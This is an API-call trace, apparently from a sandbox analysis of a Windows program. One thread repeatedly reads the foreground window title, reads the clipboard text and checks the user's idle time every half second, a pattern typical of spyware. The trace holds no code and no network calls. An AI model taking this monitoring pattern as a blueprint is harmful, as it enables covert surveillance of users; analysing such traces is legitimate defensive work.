[0239.593] GetForegroundWindow () returned 0x103ca
[0239.593] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0239.593] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0239.593] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0239.593] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206de9
[0239.593] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206de9, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0239.593] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x0
[0239.593] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415748
[0239.593] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0239.593] ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z () returned 0x240ff50
[0239.593] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x240ff40
[0239.593] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x240ff00
[0239.593] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0239.593] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0239.593] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0239.593] OpenClipboard (hWndNewOwner=0x0) returned 1
[0239.593] GetClipboardData (uFormat=0x1) returned 0x543530
[0239.594] CloseClipboard () returned 1
[0239.594] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0239.594] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0239.594] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0239.594] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0239.594] GetTickCount () returned 0x1d4af66
[0239.594] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0239.594] Sleep (dwMilliseconds=0x1f4)
[0240.105] GetForegroundWindow () returned 0x103ca
[0240.105] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0240.105] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0240.105] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0240.105] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206d89
[0240.105] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206d89, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0240.105] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0240.105] OpenClipboard (hWndNewOwner=0x0) returned 1
[0240.105] GetClipboardData (uFormat=0x1) returned 0x543590
[0240.105] CloseClipboard () returned 1
[0240.106] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0240.106] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0240.106] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.106] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0240.106] GetTickCount () returned 0x1d4b169
[0240.106] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.106] Sleep (dwMilliseconds=0x1f4)
[0240.632] GetForegroundWindow () returned 0x103ca
[0240.632] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0240.633] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0240.633] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0240.633] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22070b9
[0240.633] GetWindowTextA (in: hWnd=0x103ca, lpString=0x22070b9, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0240.633] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0240.633] OpenClipboard (hWndNewOwner=0x0) returned 1
[0240.633] GetClipboardData (uFormat=0x1) returned 0x5433b0
[0240.633] CloseClipboard () returned 1
[0240.633] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0240.633] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0240.633] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.633] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0240.633] GetTickCount () returned 0x1d4b35d
[0240.633] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.633] Sleep (dwMilliseconds=0x1f4)
[0241.140] GetForegroundWindow () returned 0x103ca
[0241.140] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0241.140] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0241.140] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0241.140] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206d29
[0241.140] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206d29, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0241.140] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0241.140] OpenClipboard (hWndNewOwner=0x0) returned 1
[0241.140] GetClipboardData (uFormat=0x1) returned 0x5433e0
[0241.140] CloseClipboard () returned 1
[0241.140] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0241.140] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0241.141] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0241.141] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0241.141] GetTickCount () returned 0x1d4b570
[0241.141] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0241.141] Sleep (dwMilliseconds=0x1f4)
[0241.655] GetForegroundWindow () returned 0x100e4
[0241.655] GetWindowTextLengthA (hWnd=0x100e4) returned 10
[0241.655] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0241.655] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xb
[0241.655] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206d29
[0241.655] GetWindowTextA (in: hWnd=0x100e4, lpString=0x2206d29, nMaxCount=11 | out: lpString="FolderView") returned 10
[0241.655] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x0
[0241.656] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415748
[0241.656] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xb
[0241.656] ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z () returned 0x240ff50
[0241.656] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x240ff40
[0241.656] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x240ff00
[0241.656] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0241.656] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0241.656] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0241.656] OpenClipboard (hWndNewOwner=0x0) returned 1
[0241.656] GetClipboardData (uFormat=0x1) returned 0x543680
[0241.656] CloseClipboard () returned 1
[0241.656] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0241.656] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0241.656] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0241.656] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0241.656] GetTickCount () returned 0x1d4b774
[0241.656] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0241.656] Sleep (dwMilliseconds=0x1f4)
[0242.176] GetForegroundWindow () returned 0x103ca
[0242.176] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0242.176] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0242.176] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0242.176] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206f69
[0242.176] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206f69, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0242.176] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x0
[0242.176] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415748
[0242.176] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0242.176] ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z () returned 0x240ff50
[0242.176] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x240ff40
[0242.176] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x240ff00
[0242.176] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0242.176] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0242.176] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0242.176] OpenClipboard (hWndNewOwner=0x0) returned 1
[0242.176] GetClipboardData (uFormat=0x1) returned 0x5434d0
[0242.177] CloseClipboard () returned 1
[0242.177] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0242.177] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0242.177] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0242.177] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0242.177] GetTickCount () returned 0x1d4b978
[0242.177] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0242.177] Sleep (dwMilliseconds=0x1f4)
[0242.693] GetForegroundWindow () returned 0x103ca
[0242.693] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0242.693] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0242.694] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0242.694] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206f99
[0242.694] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206f99, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0242.694] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0242.694] OpenClipboard (hWndNewOwner=0x0) returned 1
[0242.694] GetClipboardData (uFormat=0x1) returned 0x543680
[0242.694] CloseClipboard () returned 1
[0242.694] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0242.694] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0242.694] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0242.694] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0242.694] GetTickCount () returned 0x1d4bb7b
[0242.694] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0242.694] Sleep (dwMilliseconds=0x1f4)
[0243.202] GetForegroundWindow () returned 0x103ca
[0243.202] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0243.202] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0243.202] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0243.202] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206f99
[0243.202] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206f99, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0243.202] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0243.202] OpenClipboard (hWndNewOwner=0x0) returned 1
[0243.202] GetClipboardData (uFormat=0x1) returned 0x543680
[0243.203] CloseClipboard () returned 1
[0243.203] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0243.203] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0243.203] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0243.203] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0243.203] GetTickCount () returned 0x1d4bd7f
[0243.203] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0243.203] Sleep (dwMilliseconds=0x1f4)
[0243.704] GetForegroundWindow () returned 0x103ca
[0243.704] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0243.704] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0243.704] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0243.704] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206de9
[0243.704] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206de9, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0243.704] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0243.704] OpenClipboard (hWndNewOwner=0x0) returned 1
[0243.704] GetClipboardData (uFormat=0x1) returned 0x543680
[0243.704] CloseClipboard () returned 1
[0243.705] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0243.705] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0243.705] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0243.705] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d4bf54)) returned 1
[0243.705] GetTickCount () returned 0x1d4bf73
[0243.705] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0243.705] Sleep (dwMilliseconds=0x1f4)
[0244.446] GetForegroundWindow () returned 0x40328
[0244.446] GetWindowTextLengthA (hWnd=0x40328) returned 0
[0244.447] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0244.447] OpenClipboard (hWndNewOwner=0x0) returned 1
[0244.447] GetClipboardData (uFormat=0x1) returned 0x543530
[0244.448] CloseClipboard () returned 1
[0244.448] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0244.448] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0244.449] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0244.449] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d4c138)) returned 1
[0244.449] GetTickCount () returned 0x1d4c251
[0244.449] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0244.449] Sleep (dwMilliseconds=0x1f4)
[0245.101] GetForegroundWindow () returned 0x103ca
[0245.101] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0245.101] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0245.101] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0245.101] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206de9
[0245.101] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206de9, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0245.102] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0245.102] OpenClipboard (hWndNewOwner=0x0) returned 1
[0245.102] GetClipboardData (uFormat=0x1) returned 0x543590
[0245.102] CloseClipboard () returned 1
[0245.102] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0245.102] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0245.102] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0245.102] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d4c465)) returned 1
[0245.102] GetTickCount () returned 0x1d4c4e2
[0245.102] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0245.102] Sleep (dwMilliseconds=0x1f4)
[0245.665] GetForegroundWindow () returned 0x103ca
[0245.665] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0245.665] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0245.665] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0245.665] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206e49
[0245.665] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206e49, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0245.665] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0245.665] OpenClipboard (hWndNewOwner=0x0) returned 1
[0245.665] GetClipboardData (uFormat=0x1) returned 0x543560
[0245.666] CloseClipboard () returned 1
[0245.666] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0245.666] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0245.666] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0245.666] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d4c465)) returned 1
[0245.666] GetTickCount () returned 0x1d4c714
[0245.666] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0245.666] Sleep (dwMilliseconds=0x1f4)
Thread:
id = 104
os_tid = 0x10b0
[0230.910] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x250fe94
[0230.910] SetEvent (hEvent=0x2a8) returned 1
[0230.911] CloseHandle (hObject=0x2a8) returned 1
[0230.911] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x250f88c
[0230.911] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x250f87c
[0230.911] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x250f85c
[0230.914] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x11
[0230.915] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x4
[0230.915] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x250f83c
[0230.915] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x250f85c
[0230.915] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.915] ??2@YAPAXI@Z () returned 0x2202d30
[0230.915] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202d30
[0230.915] free (_Block=0x0)
[0230.915] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x5
[0230.915] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x11
[0230.915] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xa
[0230.915] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x250f83c
[0230.915] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x250f85c
[0230.915] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.915] ??2@YAPAXI@Z () returned 0x2206c70
[0230.915] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206c70
[0230.915] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206c80
[0230.915] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.915] free (_Block=0x2202d30)
[0230.915] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x5
[0230.915] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x11
[0230.915] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xffffffff
[0230.915] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x250f83c
[0230.916] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x250f85c
[0230.916] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.916] ??2@YAPAXI@Z () returned 0x2200560
[0230.916] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2200560
[0230.916] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2200570
[0230.916] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2200580
[0230.916] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.916] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.916] free (_Block=0x2206c70)
[0230.916] ??2@YAPAXI@Z () returned 0x2207bb8
[0230.916] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207bb8
[0230.916] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207bc8
[0230.916] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207bd8
